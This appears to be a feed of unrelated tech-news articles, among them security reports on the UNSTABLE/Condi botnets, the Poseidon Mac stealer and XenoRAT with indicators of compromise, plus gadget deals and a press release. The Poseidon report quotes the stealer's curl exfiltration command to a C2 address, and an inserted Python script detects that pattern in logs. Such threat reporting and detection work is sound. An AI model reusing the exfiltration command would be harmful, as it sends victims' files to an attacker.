Hackers Attacking Linux Cloud Servers To Gain Control And Storage


Recent cybersecurity threats increasingly leverage cloud services for malware storage, distribution, and command and control (C2) operations.

This complicates both detection and prevention efforts.

Security researchers at FortiGuard Labs have recently observed that botnets such as UNSTABLE and Condi have been actively exploiting Linux cloud platforms to gain control and storage.

Hackers Attacking Linux Servers

Moreover, threat actors are also targeting various devices and systems, including JAWS webservers, Dasan GPON and Huawei HG532 routers, TP-Link Archer AX21, and Ivanti Connect Secure, by exploiting multiple vulnerabilities to strengthen their attacks.


The UNSTABLE botnet, a Mirai variant, uses the JAWS Webserver RCE vulnerability (CVE-2016-20016) as its initial access point and then downloads a downloader script from a particular IP.

Attack flow (Source – Fortinet)

The botnet contains three main modules: scanner, DDoS attack, and exploitation. It scans for several vulnerabilities and brute-forces using hard-coded credentials; it also has nine methods to attack using DDoS techniques.

This botnet’s configuration is XOR-encoded, and it supports thirteen architectures.

The choice of attack techniques is determined by the commands issued by the C2 server, which helps demonstrate how versatile the botnet is and its potential impact.

The Condi DDoS botnet exploits CVE-2023-1389 to infect devices and distributes its malware from trembolone.zapto.org (45.128.232.90).

FortiGuard Labs revealed two main IP addresses, 45.128.232.229 (attack source and C2 server) and 209.141.35.56 (malware storage). There are various DoS tools in use by the botnet for different Linux architectures.

The script connects to the C2 server, collects information on running processes, and transmits it back.

It seems that during this setup, separate malware storage was used in the cloud-based C2 infrastructure to check if a device could be infected before proceeding further with the infection stages.

Skibidi malware relies on two vulnerabilities: CVE-2023-1389 in TP-Link Archer AX21 and CVE-2024-21887 in Ivanti Connect Secure. It uses a script that pulls the build matching the Linux architecture of the targeted device.

The malware sidesteps detection by employing tactics like process forking, string encoding, and process name manipulation.

The malware connects to the command and control (C2) server, monitors system events, and sends reports back.

With this new breed of malware exploiting cloud services for its operations, it is clear that organizations need to step up their defenses against cloud-based threats.

To prevent such sophisticated cyber threats, multi-layered security mechanisms consisting of regular patches and network segmentation must be implemented.

IoCs

C2:-

  • 45[.]128[.]232[.]15
  • 45[.]128[.]232[.]90
  • 45[.]128[.]232[.]229
  • 45[.]128[.]232[.]234

URLs:-

  • hxxp://45[.]128[.]232[.]15
  • hxxp://45[.]128[.]232[.]90
  • hxxp://45[.]128[.]232[.]229
  • hxxp://209[.]141[.]35[.]56/getters
  • hxxp://45[.]128[.]232[.]234

Files:-



The Apple Watch SE (2nd Gen) can be yours for $189!


Amazon currently has the Apple Watch SE (2nd Gen) available for just $189. However, this is limited to a single colorway. That’s the 44mm size, with the Starlight watch case, and Starlight Sport Loop band. Others are on sale for $219, as is this one. However, this Starlight option does have a $19.01 coupon on the page, which brings it down to $199.99.

Currently, the Apple Watch SE (2nd Gen) is the cheapest Apple Watch that the company sells. It is a little over a year old at this point, but that is perfectly fine. Apple only just stopped support for the Series 3 and 4, while the SE (2nd Gen) came out with the Series 8. So it’ll continue to be supported for quite some time.

The Apple Watch SE is one of my favorite Apple Watches. I did use it for a few months before ultimately deciding to upgrade to the Apple Watch Ultra – huge upgrade, I know. The Apple Watch SE does a lot of great things at a pretty low price. Not only can it deliver notifications to your wrist, but you’ll also get Apple Pay and all kinds of health metrics.

Apple’s health measurements are pretty much the industry standard these days. The Watch SE is able to measure your heart rate from your wrist and is actually very accurate. This is surprising since measuring your heart rate that far from your heart is usually very inaccurate. However, scientific tests by companies that were not paid by Apple have shown it to be super accurate. Apple also included crash detection here, so when it detects that you might have been in a crash, you can quickly call for help. There’s sleep tracking, too, which, to be honest, leaves a bit to be desired. It really only works if you set a sleep schedule, unlike most of its competitors.

Now, on the flip side, there are some things here that are missing from something like the Apple Watch Series 9 (also on sale). Like the ability to take an ECG. There’s also no always-on display here, and the bottom of the watch is made of plastic versus glass. There’s just glass around the sensors. This does help to make it lighter, though the 40mm was already pretty light.

If you want to get into the Apple Watch world without spending a ton of cash, this is an excellent way to do just that.


YouTube is reportedly in talks with major music labels for AI-generated music


YouTube, the popular video-sharing platform, is reportedly in talks with major music labels for permission to use more songs to create AI-generated music. This move appears to be part of YouTube’s broader strategy to compete with other companies in the AI music space, like OpenAI and Meta.

The talks are said to be focused on securing licensing deals with Universal, Sony, and Warner. These deals would allow YouTube to use artists’ music for AI training in exchange for one-off payments. This move is notable because it comes just days after these same music labels filed lawsuits against AI music generators Udio and Suno for alleged copyright infringement.

YouTube has already experimented with AI-generated music through a tool called “Dream Track” for Shorts. This tool allowed a select group of creators to generate unique versions of songs in the style of various artists with their consent. YouTube now wants to expand its collection of artists and songs for AI music generation, but not necessarily for Dream Tracks.


YouTube’s “Dream Track” experiment for Shorts launched in 2023 and involves AI music generation with the permission of a number of artists

The company’s interest in AI-generated music aligns with Google’s broader AI strategy. Google has already announced a Music AI Incubator in partnership with Universal Music Group and has published YouTube’s AI music principles, promising to “embrace it responsibly together with our music partners.”

However, the rise of AI-generated music has also raised concerns among musicians. Many artists worry about the potential threats AI poses to human creativity and fair compensation. An open letter signed by over 200 artists, including Billie Eilish and Stevie Wonder, denounced the use of AI in music, particularly when it involves training AI models with music without the artist’s consent.

Meanwhile, YouTube requires creators to label videos made with generative AI, or they risk facing penalties. Artists can also request the removal of AI-generated music uploaded without their permission. As licensing deals with AI companies are becoming increasingly common, it will be interesting to see how different platforms balance this new world of AI vs human creativity.


Infinidat Revolutionizes Enterprise Cyber Storage Protection to Reduce Ransomware and Malware Threat Windows


Infinidat, a leading provider of enterprise storage solutions, has introduced a new automated cyber resiliency and recovery solution that will revolutionize how enterprises can minimize the impact of ransomware and malware attacks.

Infinidat’s InfiniSafe® Automated Cyber Protection (ACP) is a first-of-its-kind cybersecurity integration solution that is designed to reduce the threat window of cyberattacks, such as ransomware.

Sophisticated cyberattacks, including new sinister forms of AI-driven attacks, are increasingly targeting the data storage infrastructure of enterprises.

Infinidat’s InfiniSafe ACP enables enterprises to easily integrate with their Security Operations Centers (SOC), Security Information and Event Management (SIEM), Security Orchestration, Automation, and Response (SOAR) cybersecurity software applications, and simple syslog functions for less complex environments.

A security-related incident or event triggers immediate automated immutable snapshots of data, providing the ability to protect InfiniBox® and InfiniBox™ SSA block-based volumes and/or file systems and ensure near instantaneous cyber recovery.

“The merging of cybersecurity and data infrastructure has been compelling CIOs, CISOs and IT team leaders to rethink how to secure enterprise storage across hybrid multi-cloud deployments in light of increasing cyberattacks.

Enterprises need proactive strategies, seamless integration across IT domains, and the most advanced, automated technologies to stay ahead of cyber threats,” said Eric Herzog, CMO at Infinidat. Recognized as a cyber secure storage expert, Herzog is coming off participation in a string of cybersecurity panel discussions, roundtables and conference events.

“Infinidat has carved out a very unique leadership position as the only storage vendor to offer an automated enterprise storage cyber protection solution that seamlessly integrates with cyber security software applications,” said Chris Evans, Principal Analyst at Architecting IT.

“Infinidat’s newly launched InfiniSafe Automated Cyber Protection that easily meshes with the SIEM, SOAR or Security Operations Centers is exactly what enterprises need to include enterprise storage as a comprehensive approach to combat cyber threats.”

Infinidat’s new InfiniSafe ACP capability orchestrates the automatic taking of immutable snapshots of data, at the speed of compute, to stay ahead of cyberattacks by decisively cutting off the proliferation of data corruption.

Evans added, “This proactive cyber protection technique is extremely valuable, as it enables taking immediate immutable snapshots of data at the first sign of a potential cyberattack. This provides a significant advancement to ensure enterprise cyber storage resilience and recovery are integral to an enterprise’s cybersecurity strategy.

ACP enhances an enterprise’s overall cyber resilience by reducing the threat window and minimizing the impact of cyberattacks on enterprise storage environments.”

The InfiniSafe Automated Cyber Protection is one of the biggest innovations of the year in cybersecurity because it unlocks the full potential of an enterprise’s security posture and maximizes the investments that an enterprise has made in protecting the business.

By plugging into existing security mechanisms and continuous monitoring, InfiniSafe ACP bridges the gaps between enterprise storage and cybersecurity strategies that can transform the way CIOs and CISOs think about enterprise data infrastructures.                                                                      

Information technology leaders have identified this ability to automate data snapshot commands and data pathways as critical to early detection and worry-free cyber recovery that minimizes the effects of even the most vicious and deceptive cyberattacks of malicious actors.

An enterprise’s security team can put all its information from security operations through an enterprise storage intelligence grid to create the most sensitive triggers that often get missed by existing technologies and techniques.

Paul Rapier, VP of Information Technology at the Detroit Pistons, stated, “Infinidat’s efforts in enhancing cyber resilience for enterprises, particularly through the new InfiniSafe Automated Cyber Protection, are noteworthy for data security.”

Allen Shahdadi, Vice President of Global Sales at Sycomp, said, “Infinidat has become synonymous with guaranteed cyber resilient storage.

Infinidat continues to deliver powerful solutions that solve critical cyber issues for enterprises and service providers around the globe. The InfiniSafe Automated Cyber Protection solution brings much needed capabilities to fight more effectively against cyberattacks.

The automatic capture of immutable snapshots of primary data could be the difference between your data being held ransom and the rapid recovery of your data. Before international cybercriminals, hackers and fraudsters can gain an advantage, Infinidat’s InfiniSafe reduces the threat window decisively.” 

The InfiniSafe Automated Cyber Protection solution is the latest in a string of cybersecurity capabilities that Infinidat has brought forward to strengthen enterprise storage in the face of constant threats of a tsunami of cyberattacks.

Infinidat has also unveiled the following extensions of its state-of-the-art cyber resilient capabilities:

  • InfiniSafe Cyber Detection for VMware – Access to InfiniSafe cyber resilience capabilities to combat cyberattacks has been expanded into VMware environments. The impact of a cyberattack can be readily determined through this cyber detection capability, with highly granular insights by leveraging AI and machine learning whether or not a VMware datastore and the VM’s they encompass have been compromised.
  • InfiniSafe Cyber Detection for InfiniGuard® – Cyber detection will be extended onto the InfiniGuard purpose-built backup appliance to help enterprises resist and quickly recover from cyberattacks. This proven capability provides highly intelligent scanning and indexing to identify signs of cyber threats in backup environments, helping ensure that data has integrity. The enhanced version will be available in 2H 2024.

As a leader in cyber resilient storage, Infinidat first unveiled its InfiniSafe software-based platform two years ago with a set of cybersecurity functions. This solution has won numerous awards and has been proven by large global enterprises.

The comprehensive cyber resilience capabilities of InfiniSafe technology improve the ability of an enterprise to combat and protect against ever-increasing cyberattacks and data breaches by uniquely combining immutable snapshots, logical air gapping, fenced/isolated networks, and virtually instantaneous data recovery into a single, high-performance platform.

The InfiniSafe ACP is the latest example of Infinidat’s broadening innovation. It was introduced alongside the launch of the InfiniBox G4 family of next-generation storage arrays for all-flash and hybrid configurations.

The G4 series is a completely new storage array family built from the ground up that substantially extends Infinidat’s cyber storage resilience and delivers up to 2.5x improvement in performance.

The InfiniBox G4 series introduces a new set of foundational elements, powered by InfuzeOS, which is Infinidat’s software defined storage operating system.

Webinar On Demand

To watch Infinidat’s end-user webinar about the new solutions − “The Future of Enterprise Storage, Cyber Security and Hybrid Multi-Cloud” – users can click here.

About Infinidat

Infinidat provides enterprises and service providers with a platform-native primary and secondary storage architecture that delivers comprehensive data services based on InfiniVerse®. This unique platform delivers outstanding IT operating benefits, support for modern workloads across on-premises and hybrid multi-cloud environments. Infinidat’s cyber resilient-by-design infrastructure, consumption-based performance, 100% availability, and cyber security guaranteed SLAs align with enterprise IT and business priorities. Infinidat’s award-winning platform-native data services and acclaimed white glove service are continuously recommended by customers, as recognized by Gartner® Peer Insights reviews. For more information: www.infinidat.com.


Contact

Director of Global Communications
Sapna Capoor
Infinidat
+44 (0) 7789684159



‘Poseidon’ Mac stealer distributed via Google ads


On June 24, we observed a new campaign distributing a stealer targeting Mac users via malicious Google ads for the Arc browser. This is the second time in the past couple of months that we have seen Arc being used as a lure, certainly a sign of its popularity. It was previously used to drop a Windows RAT, also via Google ads.

The macOS stealer being dropped in this latest campaign is actively being developed as an Atomic Stealer competitor, with a large part of its code base being the same as its predecessor. Malwarebytes was previously tracking this payload as OSX.RodStealer, in reference to its author, Rodrigo4. The threat actor rebranded the new project ‘Poseidon’ and added a few new features such as looting VPN configurations.

In this blog post, we review the advertisement of the new Poseidon campaign from the cyber crime forum announcement, to the distribution of the new Mac malware via malvertising.

Rodrigo4 launches new PR campaign

A threat actor known by the handle Rodrigo4 on the XSS underground forum has been working on a stealer with similar features and code base as the notorious Atomic Stealer (AMOS). The service consists of a malware panel with statistics and a builder with custom name, icon and AppleScript. The stealer offers functionalities reminiscent of Atomic Stealer, including a file grabber, crypto wallet extractor, password manager (Bitwarden, KeePassXC) stealer, and browser data collector.

In a post last edited on Sunday, June 23, Rodrigo4 announced a new branding for their project:

Forum post by Rodrigo4 on XSS
Hello everyone, we have released the V4 update and there are quite a lot of new things.
The very first thing that catches your eye is the name of the project: Poseidon. Why is that? For PR management. In simple words, people didn’t know who we were.

Malware authors do need publicity, but we will try to stick to the facts and what we have observed in active malware delivery campaigns.

Distribution via Google ads

We saw an ad for the Arc browser belonging to ‘Coles & Co’, linking to the domain name arcthost[.]org:

Malicious ad for Arc browser via Google search

People who clicked on the ad were redirected to arc-download[.]com, a completely fake site offering Arc for Mac only:

Decoy website for Arc

The downloaded DMG file resembles what one would expect when installing a new Mac application with the exception of the right-click to open trick to bypass security protections:

Malicious Arc DMG installer

Connection to new Poseidon project

The new “Poseidon” stealer contains unfinished code that was seen by others, and it was also recently advertised as able to steal VPN configurations from Fortinet and OpenVPN:

Excerpt from forum post featuring new VPN capability

More interesting is the data exfiltration which is revealed in the following command:

set result_send to (do shell script \"curl -X POST -H \\\"uuid: 399122bdb9844f7d934631745e22bd06\\\" -H \\\"user: H1N1_Group\\\" -H \\\"buildid: id777\\\" --data-binary @/tmp/out.zip http:// 79.137.192[.]4/p2p\")

Navigating to this IP address reveals the new Poseidon branded panel:

Poseidon panel login page
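The exfiltration command shown above can be turned into a hunting rule over process command-line logs. The following Python code is an added example, not part of the original post or of any Malwarebytes tooling. It goes beyond the exact string by scoring any curl invocation on the header names from that command, on a temp-directory archive sent as the request body, and on a plain-HTTP destination that is a bare IP address; the log format, sample lines, weights and threshold are assumptions constructed for illustration.

```python
import ipaddress
import shlex
from urllib.parse import urlsplit

# Header names taken from the exfiltration command quoted in the article.
STEALER_HEADERS = {"uuid", "user", "buildid"}
# Assumptions for this example: staging directories, archive types, weights.
TEMP_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/")
ARCHIVE_SUFFIXES = (".zip", ".tar", ".tgz", ".gz", ".7z")
DATA_OPTIONS = {"-d", "--data", "--data-binary"}
ALERT_THRESHOLD = 4

# Constructed log lines in a hypothetical format: "<time> <host> cmd=<command line>".
# Addresses come from documentation ranges; header values are placeholders.
SAMPLE_LOG = """\
2024-06-24T10:15:02Z mac-01 cmd=curl -X POST -H "uuid: 00000000000000000000000000000000" -H "user: example_user" -H "buildid: id000" --data-binary @/tmp/out.zip http://192.0.2.10/p2p
2024-06-24T10:16:40Z mac-02 cmd=curl -fsSL https://example.com/install.sh
2024-06-24T10:17:11Z mac-02 cmd=curl -X POST -H "Content-Type: application/json" -d '{"event": "build"}' https://api.example.com/v1/events
2024-06-24T10:18:29Z mac-03 cmd=curl --data-binary @/Users/dev/build/report.json https://ci.example.com/upload
2024-06-24T10:19:55Z mac-04 cmd=/usr/bin/curl --data-binary @/private/tmp/a.zip http://198.51.100.7/up
2024-06-24T10:20:03Z mac-04 cmd=curl -H "uuid: broken
"""


def parse_curl(command):
    """Parse a curl command line; return None if it is not curl or cannot be tokenised."""
    try:
        argv = shlex.split(command)
    except ValueError:  # e.g. a log line truncated inside a quoted argument
        return None
    if not argv or argv[0].rsplit("/", 1)[-1] != "curl":
        return None
    info = {"headers": set(), "upload": None, "url": None}
    args = iter(argv[1:])
    for arg in args:
        if arg in ("-H", "--header"):
            # Keep only the header name, lower-cased, for matching.
            info["headers"].add(next(args, "").split(":", 1)[0].strip().lower())
        elif arg in DATA_OPTIONS:
            value = next(args, "")
            if value.startswith("@"):  # "@path" makes curl read the body from a file
                info["upload"] = value[1:]
        elif arg.startswith(("http://", "https://")):
            info["url"] = arg
    return info


def is_ip_literal(host):
    """True when the URL host is an IP address rather than a name."""
    try:
        ipaddress.ip_address(host or "")
        return True
    except ValueError:
        return False


def score_curl(info):
    """Return (score, reasons) for a parsed curl invocation."""
    score, reasons = 0, []
    matched = info["headers"] & STEALER_HEADERS
    if len(matched) >= 2:
        score += len(matched)
        reasons.append("custom headers: " + ", ".join(sorted(matched)))
    upload = info["upload"]
    if upload:
        score += 1
        reasons.append("local file sent as request body: " + upload)
        if upload.startswith(TEMP_PREFIXES) and upload.lower().endswith(ARCHIVE_SUFFIXES):
            score += 2
            reasons.append("archive staged in a temp directory")
    if info["url"]:
        parts = urlsplit(info["url"])
        if parts.scheme == "http" and is_ip_literal(parts.hostname):
            score += 1
            reasons.append("plain HTTP to a bare IP address")
    return score, reasons


def scan(log_text, threshold=ALERT_THRESHOLD):
    """Return [(line_number, score, reasons)] for log lines at or above the threshold."""
    alerts = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        _, sep, command = line.partition(" cmd=")
        info = parse_curl(command) if sep else None
        if info is None:
            continue
        score, reasons = score_curl(info)
        if score >= threshold:
            alerts.append((number, score, reasons))
    return alerts


if __name__ == "__main__":
    for number, score, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: score {score}: " + "; ".join(reasons))
```

On the constructed sample, the line that mirrors the quoted command and the header-less temp-archive upload are flagged, while the installer download, the JSON API call and the CI report upload stay below the threshold.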

Conclusion

There is an active scene for Mac malware development focused on stealers. As we can see in this post, there are many contributing factors to such a criminal enterprise. The vendor needs to convince potential customers that their product is feature-rich and has low detection from antivirus software.

Seeing campaigns distributing the new malware payload confirms that the threat is real and actively targeting new victims. Staying protected against these threats requires vigilance any time you download and install a new app.

Malwarebytes for Mac detects this ‘Poseidon’ campaign as OSX.RodStealer and we have already shared information related to the malicious ad with Google. We highly recommend using web protection that blocks ads and malicious websites as your first line of defense. Malwarebytes Browser Guard does both effectively.

Indicators of Compromise

Google ad domain

arcthost[.]org

Decoy site

arc-download[.]com

Download URL

zestyahhdog[.]com/Arc12645413[.]dmg

Payload SHA256

c1693ee747e31541919f84dfa89e36ca5b74074044b181656d95d7f40af34a05

C2

79.137.192[.]4/p2p


Ring Video Doorbell Plummets to $49.99: Amazon’s Biggest Discount Ever!


The Ring Video Doorbell seamlessly integrates with Amazon’s Alexa ecosystem, providing a comprehensive and convenient solution for monitoring your home’s entrance. With crystal-clear 1080p HD video and two-way audio communication, you can easily see and speak to visitors from anywhere using compatible devices like your Fire TV, Fire Tablet, or Echo Show. Alexa can even notify you when someone is at the door or when a package is delivered, enhancing your awareness and control.

With Ring Protect, you can store and share recorded videos and photos for as little as $3.99 per month per device or $10 for unlimited devices. This subscription enhances security by capturing and retaining valuable footage for future reference, ensuring you never miss a moment.

The Ring Video Doorbell’s battery life typically lasts around a month on a single charge, depending on factors like foot traffic and settings. However, its innovative Quick Release Battery feature makes swapping batteries effortless, minimizing downtime and maintaining continuous surveillance.

In addition to its impressive features and seamless integration, the Ring Video Doorbell offers the added benefit of deterring potential porch pirates. Allowing you to communicate with visitors remotely and record their every move creates a powerful deterrent against theft and enhances the overall security of your home.



Fitbit users can now add American Express cards to Google Wallet


Fitbit users can now finally add American Express cards to their Google Wallet. This means that those who use Fitbit devices can now utilize their American Express cards for payments through Google Wallet. This feature has been long-awaited since Google replaced Fitbit Pay with Google Wallet, and it has now finally been rolled out as part of the Google Play Services v24.25 update.

Previously, Google had mentioned the addition of American Express card support in an earlier update, but later retracted it. However, the feature has been reintroduced in the latest update, and users have reported successfully adding their American Express cards to their Fitbit devices. The official changelog for the update also confirms the addition of this feature.

In addition to American Express card support, the Google Play Services v24.25 update brings several other changes for Google Wallet users. These changes include:

  • The ability to add an e-wallet as a payment method or use linked e-wallets in Google Pay to complete payments on your phone.
  • New features for IDs added to Wallet on your phone.
  • The option to use Pixel as a payment method in Wallet on your phone.

The rollout of American Express card support for Fitbit devices is a significant development for users who have been eagerly awaiting this feature. It provides greater flexibility and convenience for those who prefer to use their American Express cards for payments. The additional changes included in the update further enhance the functionality of Google Wallet, making it a more versatile and comprehensive payment solution.

While Google has not officially confirmed the completion of the rollout, the reports of successful additions and the mention in the official changelog suggest that the feature is now widely available. This update is a welcome addition for Fitbit owners, who can now enjoy the convenience of using their American Express cards for payments on their devices.



PoC Exploit Released for Fortra FileCatalyst SQL Injection Vulnerability


A Proof-of-Concept (PoC) exploit has been released for a critical SQL Injection vulnerability in Fortra FileCatalyst Workflow.

This vulnerability could potentially allow attackers to modify application data.

This vulnerability, CVE-2024-5276, affects all versions of Fortra FileCatalyst Workflow from 5.1.6 Build 135 and earlier.

The SQL Injection vulnerability, discovered on June 18, 2024, is classified under CWE-20 and CWE-89.

These classifications indicate improper input validation and improper neutralization of special elements used in an SQL command.

The vulnerability has a CVSS v3.1 score of 9.8, reflecting its critical nature (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

This attack exploits target software that constructs SQL statements based on user input.

An attacker can craft input strings so that when the target software constructs SQL statements based on the input, the resulting SQL statement performs actions other than those the application intended.

This vulnerability results from the failure of the application to validate input appropriately.

Potential Impacts

This vulnerability’s likely impacts include creating administrative users and deleting or modifying data in the application database.

However, data exfiltration via SQL injection is not possible with this vulnerability.


Successful unauthenticated exploitation requires a Workflow system with anonymous access enabled; otherwise, an authenticated user is needed.

The vulnerability affects all versions of FileCatalyst Workflow from 5.1.6 Build 135 and earlier.

Users of these versions are strongly advised to update their systems to the latest version to mitigate the risk.

Fortra has yet to release an official patch, but users should monitor the vendor’s advisories for updates.

The release of the PoC exploit for this critical SQL Injection vulnerability underscores the importance of timely updates and robust security practices.

Organizations using FileCatalyst Workflow should act swiftly to secure their systems against potential exploitation.


Huawei sees AI smartphones taking 90% of the market by 2030


AI is all over the place at the moment… as far as technology goes. It’s the current buzzword that is being used. Many smartphone OEMs have included plenty of AI features in their devices. The same goes for Huawei, who believes that AI smartphones will account for 90% of the market by 2030.

This was said by Huawei’s Executive Director and Chairman of the ICT Infrastructure Business Management Committee, Wang Tao. He said it during the keynote speech in Shanghai yesterday.

Huawei believes AI smartphones will take 90% of the market by 2030

He believes that AI-powered smartphones will account for 11% of shipments this year. That could reach the 90% level by 2030, though. He essentially sees the integration of LLMs and AI features becoming a standard for the industry.

Tao said the following: “We will soon see a huge boost to traffic from AI. At the same time, 5G-A networks will be able to provide higher speeds, lower latency, and greater capacity to meet the network demands of the AI era”.

Many smartphones already offer such features and are considered ‘AI smartphones’. Apple joined the fray with the company’s iOS 18 announcement recently. Well, users still don’t have access to all that, at least not in the stable form. Still, they’ll get access in a couple of months.

Companies will be able to run more and more AI tasks locally

When it comes to AI features, your phones need to talk to the server that runs larger LLMs. So for some processes, that is necessary. Companies are expected to be able to do more and more such tasks on smartphones, natively, though. LLMs will be getting more efficient, and processors more powerful and capable in the AI sense.

So, it seems like the AI buzzword is here to stay. Companies likely won’t stop using it, though they may reshape it. Apple, for example, avoided using ‘AI’, and simply calls its features ‘Apple Intelligence’.



Xeno RAT Attacking Users Via GitHub Repository And .gg Domains


Threat actors use RATs because they provide attackers with persistent access to compromised systems, enabling long-term espionage and exploitation.

North Korean hackers and other actors who target the gaming community are using free malware on GitHub called XenoRAT.

Hunt’s research team found it spreading through .gg domains and a GitHub repository that pretended to be Roblox scripting tools.

Xeno RAT Attacking Via GitHub

The ASEC division of AhnLab claimed it had evidence of a North Korea-related group employing Dropbox to send XenoRAT.


Besides this, one investigator discovered the software in an open directory that the Kimsuky threat group probably controls.

This growing threat uses a range of deceptive techniques to reach gamers and developers across platforms.

XenoRAT’s GitHub page lists more advanced features such as HVNC, audio spying, and SOCKS5 reverse proxy.

Communication between clients and the controller is done through TCP sockets, and this follows an identifiable pattern that can be used to identify malicious activities.

The worrying point is that the malware is being distributed via .gg domains, which are popular within the esports community, to target gamers. The network IDS rules for detection are available on the ET website.

It shows how threat actors increasingly use well-known platforms and communities to spread their tools.

The discovery of SynapseX.revamped.V1.2.rar, an untrusted file that communicated with .gg sites, led to the identification of a GitHub repository disguised as a Roblox scripting engine.

YouTube Account Associated with Xeno RAT & Quasar Distribution (Source – Hunt.io)

The repository contained several harmful executable files, such as XenoRAT and Quasar. Earlier, this GitHub user recognized one file as XWorm malware.

Further inquiries revealed that a YouTube channel called “P-Denny Gaming” was linked to it, which recommended that users turn off Windows Defender before installing that malware.

YouTube Video Instructing Users to Install Synapse X File (Source – Hunt.io)

The content of the channel, together with its comments, tried to make these malicious files appear genuine.

The XenoRAT and other malware are very dangerous to the gaming communities when distributed through .gg domains as well as on GitHub.

These threats take advantage of gamers’ trust in legitimate-looking tools, which may result in the theft of personal data, game items, and financial details.

Using open-source platforms for malware distribution increases the chances of widespread infections.

Even if users are inclined to download or install software from sites they regard as trustworthy, they should be extremely careful.

For a safe internet gaming environment, users need to be extra cautious and skeptical, since these complex social engineering ploys mostly affect the gaming community.
